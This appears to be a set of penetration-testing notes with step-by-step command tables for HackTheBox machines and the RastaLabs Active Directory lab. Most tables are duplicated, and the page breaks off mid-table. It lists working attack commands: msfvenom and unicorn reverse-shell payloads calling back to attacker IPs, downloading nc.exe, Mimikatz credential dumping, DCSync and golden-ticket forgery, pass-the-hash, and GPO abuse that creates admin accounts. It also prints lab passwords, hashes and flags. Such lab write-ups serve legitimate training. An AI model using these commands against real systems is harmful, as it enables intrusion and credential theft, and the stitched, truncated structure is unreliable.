Comment on page

Network Scenarios

Network#1
LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts
Network#2
Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket
Network#3
always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service
Network#4
Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DSync Attack
# Network#5
ID
Stage
Techniques
Commands
1
Enumeration
Online search for lab IP range
N/A
2
Enumeration
Port scanning with masscan
masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0
3
Enumeration
Detailed host scanning with nmap
nmap (specific commands not provided)
4
Enumeration
Finding domain names with crackmapexec
crackmapexec (specific commands not provided)
Reel
ID
Stage
Techniques
Commands
1
Recon
Nmap scanning
nmap -sC -sV -oA nmap/result 10.10.10.210
2
Enumeration
Gobuster directory scanning
gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
3
Credential Harvesting
Gathering usernames
Gather usernames manually and create a user.txt file
4
Credential Harvesting
Password spraying
python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01
5
Phishing
Sending phishing emails
Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
6
Hash Cracking
Cracking NTLMv2 hash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
7
Access
PowerShell remote session
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
8
Privilege Escalation
Creating a Symlink
New-Item -ItemType Junction -Path 'C:\\ProgramData\\root' -Target 'C:\\Users\\Administrator'
9
Privilege Escalation
Using Check-File command
Check-File C:\\programdata\\root\\Desktop\\root.txt
10
Exfiltration
Transferring files with nc.exe
iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe'
Jewel
ID
Stage
Techniques
Commands
1
Recon
Nmap scanning
nmap -sC -sV -oA nmap/result 10.10.10.211
2
Web Enumeration
Checking server with Wappalyzer
Use Wappalyzer to identify backend technologies
3
Web Enumeration
Analyzing .git directory
Check the Gemfile in the .git directory for Ruby and Gem versions
4
Exploitation
Exploiting Ruby on Rails
Use a Ruby on Rails exploit 
5
Post-Exploitation
Capturing request in Burp
Capture the request and modify it with the exploit
6
Post-Exploitation
Getting a reverse shell
Use netcat listener and send the exploit to get a reverse shell
7
Privilege Escalation
Cracking password hashes
Use John the Ripper to crack password hashes found in /var/backups
8
Privilege Escalation
Using .google_authenticator file
Use the contents of .google_authenticator to bypass two-factor authentication
9
Privilege Escalation
Synchronizing time for successful exploit
Adjust the system time to match the timezone for the exploit to work
10
Privilege Escalation
Gaining root access with GTFOBins
sudo gem open -e "/bin/sh -c /bin/sh" rdoc to gain root access
Atom
ID
Stage
Techniques
Commands
1
Recon
Nmap scanning
nmap -sV -sC -oN nmap 10.10.10.237
2
File Analysis
Analyzing executable file
file heedv1\\ Setup\\ 1.0.0.exe
3
SMB Enumeration
Enumerating SMB shares
smbclient -L \\\\10.10.10.237
4
SMB File Transfer
Transferring files via SMB
smbclient \\\\\\\\10.10.10.237\\Software_Updates then get UAT_Testing_Procedures.pdf
5
Exploitation
Crafting malicious binary
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"
6
YML File Creation
Creating a .yml file for the exploit
Manual creation of latest.yml file
7
SMB File Transfer
Uploading .yml file via SMB
smbclient \\\\\\\\10.10.10.237\\Software_Updates then put latest.yml
8
Reverse Shell
Obtaining a reverse shell
Use Metasploit to listen for the reverse shell
9
Redis Exploitation
Exploiting Redis
redis-cli -h 10.10.10.237 then get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
10
Password Decryption
Decrypting password
python3 decrypt.py with the script provided in the summary
Network1
ID
Stage
Techniques
Commands
1
Data Analysis
Reading pcap file
Use NetworkMiner to read the .dmp file and extract the secret file
2
Cryptography
Decoding the flag
Use filecryptopgraphy.psm1 PowerShell module
3
File Preparation
Preparing files for decryption
Rename the secret file to secret.txt.AES on ws04
4
Key Conversion
Converting key for decryption
`$key = Get-Content key.txt
5
File Decryption
Decrypting the file
Unprotect-File '.\\secret.txt.AES' -Algorithm AES -Key $key
6
Flag Retrieval
Retrieving the flag
The flag is RASTA{cryp70_3xf1l7r4710n}
Network2
ID
Stage
Techniques
Commands
1
Credential Dumping
Enumerating credentials on WS02
Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force
2
Credential Dumping
Using Mimikatz to dump creds
Upload mimikatz.exe and execute sekurlsa::dpapi to get the master key
3
Credential Decryption
Decrypting credentials
dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...
4
Port Forwarding
Setting up port forwarding
portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389
5
RDP Connection
Connecting via RDP with Remmina
Install Remmina, import sql01.rdp, change host, export to .rdp file
6
RDP Connection
Using xfreerdp to connect
xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local
7
Flag Retrieval
Retrieving the flag
The flag is RASTA{c00k1n6_w17h_645_n0w}
Network3
ID
Stage
Techniques
Commands
1
Credential Enumeration
Finding LAPS group members
Enumeration to find ngodfrey_adm is part of LAPS group on WS05
2
Credential Access
Dumping credentials with PowerSploit
powershell -ep bypass then Import-module ./PowerSploit.psd1
3
Credential Access
Using credentials for access
$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force then $cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\\ngodfrey_adm', $SecPassword)
4
Credential Access
Getting AD object with credentials
Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred
5
Local Admin Passwords
Retrieving local admin passwords
Passwords are listed for WS01, WS02, WS03, WS04, WS05
6
Port Forwarding
Setting up port forwarding with Meterpreter
portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445 and similar for other ports
7
Exploitation
Using MS17-010 exploit for admin shell
exploit/windows/smb/ms17_010_psexec with lport 80, 443, 8080
8
Flag Retrieval
Retrieving flags from WS02 and WS04
Flags are RASTA{3v3ryb0dy_l0v35_l4p5}, RASTA{wh3r3_w45_2f4_!?}, RASTA{50m371m35_y0u_mu57_b4ck7r4ck}
9
Post-Exploitation
Running Mimikatz on WS02
privilege::debug then sekurlsa::logonPasswords
10
File Permissions
Modifying file permissions for flag
icacls flag.txt /grant administrator:F or icacls flag.txt /grant RLAB\\ahope:F
Network4
ID
Stage
Techniques
Commands
1
Privilege Escalation
AS-REP Roasting
Import-module ./asreproast.ps1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash
2
Hash Extraction
Saving Hash
Copy the hash to a txt file and save it with UTF-8 encoding
3
Wordlist Creation
Using kwprocessor
./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt
4
Password Cracking
Using John the Ripper
Use John the Ripper (jumbo version) to crack the hash
5
Credential Use
User Enumeration
net use H: \\\\fs01.rastalabs.local\\home$\\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"
6
Flag Retrieval
Accessing Flag
The flag is RASTA{k3rb3r05_15_7r1cky}
Network5
ID
Stage
Techniques
Commands
1
Enumeration
Viewing shares on fs01
net view \\fs01 /all
2
Enumeration
Using PowerSploit for enumeration
powershell -ep bypass
Import-module ./PowerSploit.psd1
Get-NetShare \\fs01
3
Flag Retrieval
Accessing open shares
Flag is RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}
Network6
ID
Stage
Techniques
Commands
1
Phishing
Creating phishing HTA
python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta
2
Web Server Setup
Hosting HTA on Apache2
copy index.html launcher.hta /var/www/html
service apache2 start
3
Listener Setup
Setting up Metasploit listener
msfconsole -r unicorn.rc
4
Share Enumeration
Viewing shares on the network
net share
net view
net use K: \\\\hostname\\share$
net view \\\\hostname /all
5
User Enumeration
Displaying domain user accounts
net user /domain
6
User Information
Viewing user info
net user [username] /domain
7
Group Enumeration
Viewing domain group members
net group finance /domain
8
Drive Enumeration
Listing logical drives
fsutil fsinfo drives
wmic logicaldisk get name
diskpart > list volume
9
Network Recon
Pinging servers for IP addresses
ping DC01
ping FS01
ping MX01
ping NIX01
ping SQL01
ping WS01
ping WS02
ping WS03
ping WS05
10
Flag Retrieval
Accessing the flag
Flag is RASTA{w007_f007h0ld_l375_pwn}
11
KeePass Database
Found KeePass database and key file
Located in M:\\Documents
Network7
ID
Stage
Techniques
Commands
1
User Enumeration
Finding user directory on fs01
net user ahope /domain
2
Network Drive Mount
Mounting network drive to access file
net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"
3
File Conversion
Converting .ppk to OpenSSH format
puttygen nix01.ppk -O private-openssh -o nix
4
Network Configuration
Adding route and running proxy server
Commands for adding route and running socks4a proxy server on ws01 not provided in summary
5
SSH Connection
Connecting via SSH with proxychains
proxychains ssh -i nix [email protected]
6
Privilege Escalation
Using exploit for privilege escalation
Compile exploit with gcc exp1.c -o exploit
7
File Transfer
Transferring exploit to target
proxychains scp -i nix -r exploit [email protected]:/home/ahope
8
File Download
Downloading file from remote to local
proxychains scp -i nix [email protected]:/usr/local/sbin/paycalc /root/Desktop/rasta
9
Flag Retrieval
Retrieving the flag
Flag is RASTA{y0ur3_4_b4ll3r_70_637_7h15}
Network8
ID
Stage
Techniques
Commands
1
Port Forwarding
Forwarding port to ws01
portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445
2
Remote Execution
Using Metasploit psexec for shell
Use msf psexec to get a shell on ws01
3
Remote Execution
Using Impacket psexec for shell
Use Impacket psexec to get a shell on ws01, add route in meterpreter
4
Proxy Configuration
Setting SOCKS4a proxy in Metasploit
Set socks4a proxy in msf, then edit /etc/proxychains.conf
5
Enumeration
Using CrackMapExec to enumerate
proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi
6
Hash Dumping
Dumping hashes
Dump hashes with CrackMapExec and proxychains
7
Credential Access
Accessing vault with Mimikatz
Use Mimikatz on ws01 to access vault credentials
8
Credential Decryption
Decrypting credentials
dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>
9
Impersonation
Impersonating user with Incognito
In meterpreter, load incognito and impersonate rweston
10
Clipboard Monitoring
Monitoring clipboard for credentials
Transfer shell to Empire and monitor clipboard
11
RDP Connection
Connecting via RDP with credentials
xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10
12
Flag Retrieval
Retrieving the flag
Flag is RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}
Network9
ID
Stage
Techniques
Commands
1
Port Forwarding
Forwarding port to ws05
portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445
2
Credential Use
Using rweston_da hash
rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa
3
Exploitation
Exploit via smb/psexec
Use the hash with smb/psexec to exploit
4
Flag Retrieval
Retrieving the flag
Flag is RASTA{53rv1c3_4bu53_f7w}
Network10
ID
Stage
Techniques
Commands
1
Credential Use
Using epugh_adm credentials
Log in to web01 (10.10.110.10) and then RDP to sql01 (10.10.122.15) using epugh_adm creds
2
Lateral Movement
RDP to fs01 with gopikrishna
RDP to fs01 with user gopikrishna [local admin]
3
Malware Execution
Running p0wnedshell.exe
Run p0wnedshell.exe with admin cmd
4
Credential Dumping
Invoke Mimikatz from p0wnedshell
Use option 4 in p0wnedshell, invoke Mimikatz to get rweston_da NTLM hash
5
Credential Use
Pass-the-hash with Mimikatz
sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa
6
Golden Ticket Attack
Perform DCSync to get krbtgt hash
Use option 10 in p0wnedshell, perform DCSync
7
Golden Ticket Attack
Generate golden ticket
kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
8
Golden Ticket Attack
Use golden ticket
kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket
9
Flag Retrieval
Accessing the flag
pushd \\\\dc01.rastalabs.local\\C$
Flag is RASTA{r4574l4b5_ch4mp10n}
Network11
ID
Stage
Techniques
Commands
1
Initial Access
Using epugh_adm credentials
Log in to web01 (10.10.110.10)
2
Lateral Movement
RDP to sql01 with epugh_adm creds
Take RDP of sql01 (10.10.122.15) using epugh_adm credentials
3
Database Access
Start SQL Management Studio
Start SQL Management Studio and connect via Windows authentication
4
Database Querying
Querying SQL database
use umbraco;
SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'
5
Flag Retrieval
Retrieving the flag from database
select * from Flag
Flag is RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}
Network12
ID
Stage
Techniques
Commands
1
Credential Use
Logging in with epugh_adm credentials
mstsc /v:web01 /u:epugh_adm /p:[password]
2
Lateral Movement
RDP to sql01 using epugh_adm
mstsc /v:sql01 /u:epugh_adm /p:[password]
3
GPO Enumeration
Enumerating GPO permissions
`Get-NetGPO
4
Group Membership
Checking group members
net user epugh_adm /domain
5
GPO Permission
Finding GPO with weak permissions
`Get-NetGPO -ComputerName fs01.rastalabs.local
6
OU Enumeration
Finding host with specific policy
`Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"
7
Policy Enumeration
Identifying applied policy
`Get-NetGPO -ComputerName fs01.rastalabs.local
8
GPO Abuse
Creating and applying immediate tasks
New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force
New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force
9
File Permissions
Modifying permissions for flag.txt
icacls flag.txt /grant administrators:F
10
Flag Retrieval
Retrieving the flag
Flag is RASTA{6p0_4bu53_15_h4rdc0r3}
SneakyMailer
ID
Stage
Techniques
Commands
1
Initial Recon
Nmap scan
nmap -sC -sV 10.10.10.197
2
DNS Enumeration
Brute-force subdomains
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185
3
Email Gathering
Extract emails
Extract emails from http://sneakycorp.htb/team.php to mails.txt
4
Phishing
Send phishing emails
Use swaks to send emails to addresses in mails.txt
5
Credential Harvesting
Decode credentials
Use Burp Suite to decode credentials from intercepted traffic
6
Email Client Setup
Configure email client
Set up evolution with SMTP server and [email protected] credentials
7
FTP Access
Access FTP
ftp 10.10.10.197 with credentials obtained
8
Reverse Shell
Upload and trigger reverse shell
Upload rev.php via FTP and trigger with curl
9
Privilege Escalation
Add SSH key to authorized keys
Add generated SSH key to /home/low/.ssh/authorized_keys via malicious package
10
Sudo Exploitation
Exploit sudo permissions
Use sudo /usr/bin/pip3 to execute a malicious package with a reverse shell
Mango
ID
Stage
Techniques
Commands
1
Port Scanning
Masscan and Nmap
masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0
nmap [options] [target]
2
Web Enumeration
Checking web ports
Access web service on ports 80 and 443
3
SSL Certificate
Viewing certificate
View SSL certificate details
4
Host File Editing
Adding VHOST to hosts file
Edit /etc/hosts to add staging-order.mango.htb
5
NoSQL Injection
Bypassing login
Use Burp Suite to intercept and modify request for NoSQL injection
6
Data Extraction
Automating credential extraction
Run Python script to extract credentials for admin and mango users
7
SSH Connection
Accessing SSH
SSH into the server using extracted credentials
8
User Flag Access
Retrieving user flag
Use su to login as admin and retrieve user flag
9
Privilege Escalation
Exploiting SUID file
Use SUID file to read root flag or exploit for root access
10
Root Flag Access
Reading root flag
Run binary or use jjs to read root flag
Time
ID
Stage
Techniques
Commands
1
Reconnaissance

ID	Stage	Techniques	Commands
1	Enumeration	Online search for lab IP range	N/A
2	Enumeration	Port scanning with masscan	`masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0`
3	Enumeration	Detailed host scanning with nmap	`nmap` (specific commands not provided)
4	Enumeration	Finding domain names with crackmapexec	`crackmapexec` (specific commands not provided)

ID	Stage	Techniques	Commands
1	Recon	Nmap scanning	`nmap -sC -sV -oA nmap/result 10.10.10.210`
2	Enumeration	Gobuster directory scanning	`gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50`
3	Credential Harvesting	Gathering usernames	Gather usernames manually and create a `user.txt` file
4	Credential Harvesting	Password spraying	`python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01`
5	Phishing	Sending phishing emails	Use Outlook to send phishing emails and capture NTLMv2 hash with Responder
6	Hash Cracking	Cracking NTLMv2 hash	`hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force`
7	Access	PowerShell remote session	`$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson`
8	Privilege Escalation	Creating a Symlink	`New-Item -ItemType Junction -Path 'C:\\ProgramData\\root' -Target 'C:\\Users\\Administrator'`
9	Privilege Escalation	Using Check-File command	`Check-File C:\\programdata\\root\\Desktop\\root.txt`
10	Exfiltration	Transferring files with nc.exe	`iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe'`

ID	Stage	Techniques	Commands
1	Recon	Nmap scanning	`nmap -sV -sC -oN nmap 10.10.10.237`
2	File Analysis	Analyzing executable file	`file heedv1\\ Setup\\ 1.0.0.exe`
3	SMB Enumeration	Enumerating SMB shares	`smbclient -L \\\\10.10.10.237`
4	SMB File Transfer	Transferring files via SMB	`smbclient \\\\\\\\10.10.10.237\\Software_Updates` then `get UAT_Testing_Procedures.pdf`
5	Exploitation	Crafting malicious binary	`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"`
6	YML File Creation	Creating a .yml file for the exploit	Manual creation of `latest.yml` file
7	SMB File Transfer	Uploading .yml file via SMB	`smbclient \\\\\\\\10.10.10.237\\Software_Updates` then `put latest.yml`
8	Reverse Shell	Obtaining a reverse shell	Use Metasploit to listen for the reverse shell
9	Redis Exploitation	Exploiting Redis	`redis-cli -h 10.10.10.237` then `get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0`
10	Password Decryption	Decrypting password	`python3 decrypt.py` with the script provided in the summary

ID	Stage	Techniques	Commands
1	Data Analysis	Reading pcap file	Use NetworkMiner to read the `.dmp` file and extract the secret file
2	Cryptography	Decoding the flag	Use `filecryptopgraphy.psm1` PowerShell module
3	File Preparation	Preparing files for decryption	Rename the secret file to `secret.txt.AES` on ws04
4	Key Conversion	Converting key for decryption	`$key = Get-Content key.txt
5	File Decryption	Decrypting the file	`Unprotect-File '.\\secret.txt.AES' -Algorithm AES -Key $key`
6	Flag Retrieval	Retrieving the flag	The flag is `RASTA{cryp70_3xf1l7r4710n}`

ID	Stage	Techniques	Commands
1	Credential Dumping	Enumerating credentials on WS02	`Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force`
2	Credential Dumping	Using Mimikatz to dump creds	Upload `mimikatz.exe` and execute `sekurlsa::dpapi` to get the master key
3	Credential Decryption	Decrypting credentials	`dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...`
4	Port Forwarding	Setting up port forwarding	`portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389`
5	RDP Connection	Connecting via RDP with Remmina	Install Remmina, import `sql01.rdp`, change host, export to `.rdp` file
6	RDP Connection	Using xfreerdp to connect	`xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local`
7	Flag Retrieval	Retrieving the flag	The flag is `RASTA{c00k1n6_w17h_645_n0w}`

ID	Stage	Techniques	Commands
1	Credential Enumeration	Finding LAPS group members	Enumeration to find `ngodfrey_adm` is part of LAPS group on WS05
2	Credential Access	Dumping credentials with PowerSploit	`powershell -ep bypass` then `Import-module ./PowerSploit.psd1`
3	Credential Access	Using credentials for access	`$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force` then `$cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\\ngodfrey_adm', $SecPassword)`
4	Credential Access	Getting AD object with credentials	`Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred`
5	Local Admin Passwords	Retrieving local admin passwords	Passwords are listed for WS01, WS02, WS03, WS04, WS05
6	Port Forwarding	Setting up port forwarding with Meterpreter	`portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445` and similar for other ports
7	Exploitation	Using MS17-010 exploit for admin shell	`exploit/windows/smb/ms17_010_psexec` with `lport 80, 443, 8080`
8	Flag Retrieval	Retrieving flags from WS02 and WS04	Flags are `RASTA{3v3ryb0dy_l0v35_l4p5}`, `RASTA{wh3r3_w45_2f4_!?}`, `RASTA{50m371m35_y0u_mu57_b4ck7r4ck}`
9	Post-Exploitation	Running Mimikatz on WS02	`privilege::debug` then `sekurlsa::logonPasswords`
10	File Permissions	Modifying file permissions for flag	`icacls flag.txt /grant administrator:F` or `icacls flag.txt /grant RLAB\\ahope:F`

ID	Stage	Techniques	Commands
1	Privilege Escalation	AS-REP Roasting	`Import-module ./asreproast.ps1` `Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1` `Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 \| select -expand hash`
2	Hash Extraction	Saving Hash	Copy the hash to a txt file and save it with UTF-8 encoding
3	Wordlist Creation	Using kwprocessor	`./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt`
4	Password Cracking	Using John the Ripper	Use John the Ripper (jumbo version) to crack the hash
5	Credential Use	User Enumeration	`net use H: \\\\fs01.rastalabs.local\\home$\\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"`
6	Flag Retrieval	Accessing Flag	The flag is `RASTA{k3rb3r05_15_7r1cky}`

ID	Stage	Techniques	Commands
1	Enumeration	Viewing shares on `fs01`	`net view \\fs01 /all`
2	Enumeration	Using PowerSploit for enumeration	`powershell -ep bypass` `Import-module ./PowerSploit.psd1` `Get-NetShare \\fs01`
3	Flag Retrieval	Accessing open shares	Flag is `RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}`

ID	Stage	Techniques	Commands
1	Phishing	Creating phishing HTA	`python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta`
2	Web Server Setup	Hosting HTA on Apache2	`copy index.html launcher.hta /var/www/html` `service apache2 start`
3	Listener Setup	Setting up Metasploit listener	`msfconsole -r unicorn.rc`
4	Share Enumeration	Viewing shares on the network	`net share` `net view` `net use K: \\\\hostname\\share$` `net view \\\\hostname /all`
5	User Enumeration	Displaying domain user accounts	`net user /domain`
6	User Information	Viewing user info	`net user [username] /domain`
7	Group Enumeration	Viewing domain group members	`net group finance /domain`
8	Drive Enumeration	Listing logical drives	`fsutil fsinfo drives` `wmic logicaldisk get name` `diskpart > list volume`
9	Network Recon	Pinging servers for IP addresses	`ping DC01` `ping FS01` `ping MX01` `ping NIX01` `ping SQL01` `ping WS01` `ping WS02` `ping WS03` `ping WS05`
10	Flag Retrieval	Accessing the flag	Flag is `RASTA{w007_f007h0ld_l375_pwn}`
11	KeePass Database	Found KeePass database and key file	Located in `M:\\Documents`

ID	Stage	Techniques	Commands
1	User Enumeration	Finding user directory on `fs01`	`net user ahope /domain`
2	Network Drive Mount	Mounting network drive to access file	`net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"`
3	File Conversion	Converting .ppk to OpenSSH format	`puttygen nix01.ppk -O private-openssh -o nix`
4	Network Configuration	Adding route and running proxy server	Commands for adding route and running socks4a proxy server on `ws01` not provided in summary
5	SSH Connection	Connecting via SSH with proxychains	`proxychains ssh -i nix [email protected]`
6	Privilege Escalation	Using exploit for privilege escalation	Compile exploit with `gcc exp1.c -o exploit`
7	File Transfer	Transferring exploit to target	`proxychains scp -i nix -r exploit [email protected]:/home/ahope`
8	File Download	Downloading file from remote to local	`proxychains scp -i nix [email protected]:/usr/local/sbin/paycalc /root/Desktop/rasta`
9	Flag Retrieval	Retrieving the flag	Flag is `RASTA{y0ur3_4_b4ll3r_70_637_7h15}`

ID	Stage	Techniques	Commands
1	Port Forwarding	Forwarding port to `ws01`	`portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445`
2	Remote Execution	Using Metasploit psexec for shell	Use msf psexec to get a shell on `ws01`
3	Remote Execution	Using Impacket psexec for shell	Use Impacket psexec to get a shell on `ws01`, add route in meterpreter
4	Proxy Configuration	Setting SOCKS4a proxy in Metasploit	Set socks4a proxy in msf, then edit `/etc/proxychains.conf`
5	Enumeration	Using CrackMapExec to enumerate	`proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi`
6	Hash Dumping	Dumping hashes	Dump hashes with CrackMapExec and proxychains
7	Credential Access	Accessing vault with Mimikatz	Use Mimikatz on `ws01` to access vault credentials
8	Credential Decryption	Decrypting credentials	`dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>`
9	Impersonation	Impersonating user with Incognito	In meterpreter, load incognito and impersonate `rweston`
10	Clipboard Monitoring	Monitoring clipboard for credentials	Transfer shell to Empire and monitor clipboard
11	RDP Connection	Connecting via RDP with credentials	`xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10`
12	Flag Retrieval	Retrieving the flag	Flag is `RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}`

ID	Stage	Techniques	Commands
1	Port Forwarding	Forwarding port to ws05	`portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445`
2	Credential Use	Using rweston_da hash	`rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa`
3	Exploitation	Exploit via smb/psexec	Use the hash with smb/psexec to exploit
4	Flag Retrieval	Retrieving the flag	Flag is `RASTA{53rv1c3_4bu53_f7w}`

ID	Stage	Techniques	Commands
1	Credential Use	Using `epugh_adm` credentials	Log in to `web01 (10.10.110.10)` and then RDP to `sql01 (10.10.122.15)` using `epugh_adm` creds
2	Lateral Movement	RDP to `fs01` with `gopikrishna`	RDP to `fs01` with user `gopikrishna` [local admin]
3	Malware Execution	Running `p0wnedshell.exe`	Run `p0wnedshell.exe` with admin cmd
4	Credential Dumping	Invoke Mimikatz from `p0wnedshell`	Use option 4 in `p0wnedshell`, invoke Mimikatz to get `rweston_da` NTLM hash
5	Credential Use	Pass-the-hash with Mimikatz	`sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa`
6	Golden Ticket Attack	Perform DCSync to get `krbtgt` hash	Use option 10 in `p0wnedshell`, perform DCSync
7	Golden Ticket Attack	Generate golden ticket	`kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket`
8	Golden Ticket Attack	Use golden ticket	`kerberos::ptt C:\\Users\\GOPIKR~1\\Desktop\\rweston_da.ticket`
9	Flag Retrieval	Accessing the flag	`pushd \\\\dc01.rastalabs.local\\C$` Flag is `RASTA{r4574l4b5_ch4mp10n}`

ID	Stage	Techniques	Commands
1	Initial Access	Using `epugh_adm` credentials	Log in to `web01 (10.10.110.10)`
2	Lateral Movement	RDP to `sql01` with `epugh_adm` creds	Take RDP of `sql01 (10.10.122.15)` using `epugh_adm` credentials
3	Database Access	Start SQL Management Studio	Start SQL Management Studio and connect via Windows authentication
4	Database Querying	Querying SQL database	`use umbraco;` `SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'`
5	Flag Retrieval	Retrieving the flag from database	`select * from Flag` Flag is `RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}`

ID	Stage	Techniques	Commands
1	Credential Use	Logging in with `epugh_adm` credentials	`mstsc /v:web01 /u:epugh_adm /p:[password]`
2	Lateral Movement	RDP to `sql01` using `epugh_adm`	`mstsc /v:sql01 /u:epugh_adm /p:[password]`
3	GPO Enumeration	Enumerating GPO permissions	`Get-NetGPO
4	Group Membership	Checking group members	`net user epugh_adm /domain`
5	GPO Permission	Finding GPO with weak permissions	`Get-NetGPO -ComputerName fs01.rastalabs.local
6	OU Enumeration	Finding host with specific policy	`Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"
7	Policy Enumeration	Identifying applied policy	`Get-NetGPO -ComputerName fs01.rastalabs.local
